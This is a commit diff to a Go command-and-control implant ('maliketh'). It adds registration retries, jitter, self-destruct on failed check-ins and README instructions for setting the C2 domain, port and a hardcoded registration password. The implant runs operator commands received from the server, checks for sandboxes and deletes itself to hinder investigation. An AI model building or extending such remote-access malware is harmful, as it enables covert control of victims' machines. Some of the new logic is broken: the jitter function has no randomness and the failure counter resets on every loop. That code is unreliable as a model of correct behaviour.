Improvements to go implant

cbrnrd · cbrnrd · commit 6a664f2f930b · 2023-12-13T17:26:59.000-05:00
diff --git a/design/profile.md b/design/profile.md
@@ -23,13 +23,12 @@ Profiles are YAML files with three main top level directives: `client`, `server`
 | Option | Description | Required | Type |
 |--------|-------------|----------|------|
 | `user_agent` | The user agent to use when making HTTP requests | Yes | String |
-<!-- | `encoding` | The encoding to use when sending encrypted data to the C2. | Yes | One of: `base64`, `hex` | -->
 | `sleep_time` | The number of seconds to sleep between each HTTP request | Yes | Integer |
 | `jitter` | % jitter. The implant will sleep for a random amount of time between `sleep` and `sleep * (1 + jitter)` | Yes | Float, `[0, 0.99]` |
 | `max_retries` | The maximum number of times to retry a request before giving up | Yes | Integer |
 | `auto_self_destruct` | Whether or not to self destruct on failed checkins. If set to true, the implant will delete itself after `max_retries` failed checkins. | Yes | Boolean |
 | `retry_wait` | The number of seconds to wait before retrying a request. | Yes | Integer |
-| `retry_jitter` | % jitter. The implant will wait for a random amount of time between `retry_wait` and `retry_wait * (1 + retry_jitter)` | Yes | Float, `[0, 0.99]` |
+| `retry_jitter` | % jitter. Between checkins, the implant will wait for a random amount of time between `retry_wait` and `retry_wait * (1 + retry_jitter)` | Yes | Float, `[0, 0.99]` |
 | `tailoring_hashes` | A list of hashes to use for payload tailoring. | Yes | List of strings |
 | `tailoring_hash_function` | The hash function to use for payload tailoring. | Yes | One of: `sha256`, `md5` |
 | `tailoring_hash_rounds` | The number of hash rounds to use for payload tailoring. | Yes | Integer |
diff --git a/go_implant/.gitignore b/go_implant/.gitignore
@@ -0,0 +1,2 @@
+implant-dev-debug
+build/*
diff --git a/go_implant/README.md b/go_implant/README.md
@@ -7,6 +7,18 @@ Some functions were adapted from [Coldfire](https://github.com/redcode-labs/Cold
 
 ## Building
 
+There are a few values you need to change before building the implant.
+
+In `pkg/config/config.go` you need to change the following values to match your server configuration:
+```go
+// !!!!!!!!!! CHANGE THESE !!!!!!!!! //
+const C2_DOMAIN = "localhost"
+const C2_PORT = 80
+const C2_USE_TLS = false
+const C2_REGISTER_PASSWORD = "SWh5bHhGOENYQWF1TW9KR3VTb0YwVkVWbDRud1RFaHc="
+// !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! //
+```
+
 To build the development implant, simply run
 
 ```bash
@@ -44,10 +56,11 @@ The C++ implant is a bit more optimized for real world use. The golang implant *
 
 ## TODO
 
-* [ ] Register retries
+* [x] Register retries
 * [ ] Persistence
 * [ ] Do something "normal" when sandbox is detected
-* [ ] Auto self destruct
-* [ ] Jitter
+* [x] Auto self destruct
+* [x] Jitter
+* [ ] Builder sript
 
 
diff --git a/go_implant/cmd/main.go b/go_implant/cmd/main.go
@@ -7,6 +7,7 @@ import (
 	"maliketh/pkg/implant"
 	"maliketh/pkg/sandbox"
 	. "maliketh/pkg/utils"
+	"os"
 	"time"
 )
 
@@ -28,21 +29,36 @@ func main() {
 	DebugPrintln(fmt.Sprintf("Public key: %s", public))
 	DebugPrintln(fmt.Sprintf("Private key: %s", private))
 
-	profile, err := implant.Register(config.GetC2Url(), public, private)
-	if err != nil {
-		panic(err)
+	// Attempt to register the configured number of times
+	for i := 0; i < config.REGISTER_ATTEMPTS; i++ {
+		profile, err := implant.Register(config.GetC2Url(), public, private)
+		if err != nil {
+			DebugPrintln(fmt.Sprintf("Error registering: %s", err))
+			if i == config.REGISTER_ATTEMPTS-1 {
+				DebugPrintln("Max registration attempts reached, exiting...")
+				if config.AUTO_SELF_DESTRUCT {
+					implant.SelfDestruct()
+				}
+				os.Exit(0)
+			}
+			continue
+		}
+		config.CurrentProfile = &profile
+		break
 	}
-	config.CurrentProfile = &profile
 
+	failed_checkins := 0
 	for {
-		time.Sleep(time.Duration(config.CurrentProfile.Config.Sleep) * time.Second)
+		time.Sleep(time.Duration(time.Duration(CalculateSleepWithJitter(config.CurrentProfile.Config.Sleep, float32(config.CurrentProfile.Config.Jitter))) * time.Second))
 		task, err := implant.Checkin(config.GetC2Url(), *config.CurrentProfile)
 		if err != nil {
-			panic(err)
+			failed_checkins++
+			if failed_checkins == config.CurrentProfile.Config.MaxRetries && config.AUTO_SELF_DESTRUCT {
+				DebugPrintln("Max failed checkins reached, exiting...")
+				implant.SelfDestruct()
+			}
 		}
-		// DebugPrintln(fmt.Sprintf("Task ID: %s\n", task.TaskId))
-		// opcode := task.Opcode
-		// DebugPrintln(fmt.Sprintf("Opcode: %d\n", opcode))
+		failed_checkins = 0
 
 		go implant.Handle(config.GetC2Url(), task, *config.CurrentProfile)
 	}
diff --git a/go_implant/go.mod b/go_implant/go.mod
@@ -4,7 +4,6 @@ go 1.21.4
 
 require (
 	emperror.dev/errors v0.8.1
-	github.com/davecgh/go-spew v1.1.1
 	github.com/denisbrodbeck/machineid v1.0.1
 	github.com/mitchellh/go-ps v1.0.0
 	golang.org/x/crypto v0.15.0
diff --git a/go_implant/pkg/config/config.go b/go_implant/pkg/config/config.go
@@ -17,6 +17,8 @@ const C2_REGISTER_PASSWORD = "SWh5bHhGOENYQWF1TW9KR3VTb0YwVkVWbDRud1RFaHc="
 
 const INITIAL_SLEEP = 180
 const REGISTER_USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)"
+const REGISTER_ATTEMPTS = 3
+const AUTO_SELF_DESTRUCT = false
 
 var CurrentProfile *models.MalleableProfile
 
diff --git a/go_implant/pkg/implant/handlers.go b/go_implant/pkg/implant/handlers.go
@@ -15,7 +15,6 @@ import (
 	"time"
 
 	"maliketh/pkg/shellcode"
-	"github.com/davecgh/go-spew/spew"
 
 	oslib "maliketh/pkg/os"
 
@@ -25,12 +24,10 @@ import (
 func Handle(c2Url string, task models.Task, profile models.MalleableProfile) {
 	var output string
 	var err error
-	// spew.Dump(task)
 	switch task.Opcode {
 	case models.NOOP:
 		return
 	case models.OP_CMD:
-		spew.Dump(task)
 		output, err = Cmd(task.Args.([]interface{}))
 	case models.OP_SELFDESTRUCT:
 		output, err = SelfDestruct()
@@ -92,7 +89,7 @@ func Cmd(args []interface{}) (output string, err error) {
 	return
 }
 
-// Self destruct the implant
+// Self destruct the implant. This removes the executable from disk and exits with a 0 exit code.
 func SelfDestruct() (output string, err error) {
 
 	// Get the path to the executable
diff --git a/go_implant/pkg/utils/utils.go b/go_implant/pkg/utils/utils.go
@@ -45,3 +45,8 @@ func GetNTPTime() time.Time {
 	binary.Read(sock, binary.BigEndian, transmit)
 	return time.Date(1900, 1, 1, 0, 0, 0, 0, time.UTC).Add(time.Duration(((transmit.ReceiveTime >> 32) * 1000000000)))
 }
+
+// CalculateSleepWithJitter calculates the sleep time with jitter factor.
+func CalculateSleepWithJitter(base int, jitter float32) float32 {
+	return float32(base) * (1 + jitter)
+}

Original file line number	Diff line number	Diff line change
`@@ -45,3 +45,8 @@ func GetNTPTime() time.Time {`
`45`	`45`	`binary.Read(sock, binary.BigEndian, transmit)`
`46`	`46`	`return time.Date(1900, 1, 1, 0, 0, 0, 0, time.UTC).Add(time.Duration(((transmit.ReceiveTime >> 32) * 1000000000)))`
`47`	`47`	`}`
	`48`	`+`
	`49`	`+// CalculateSleepWithJitter calculates the sleep time with jitter factor.`
	`50`	`+func CalculateSleepWithJitter(base int, jitter float32) float32 {`
	`51`	`+ return float32(base) * (1 + jitter)`
	`52`	`+}`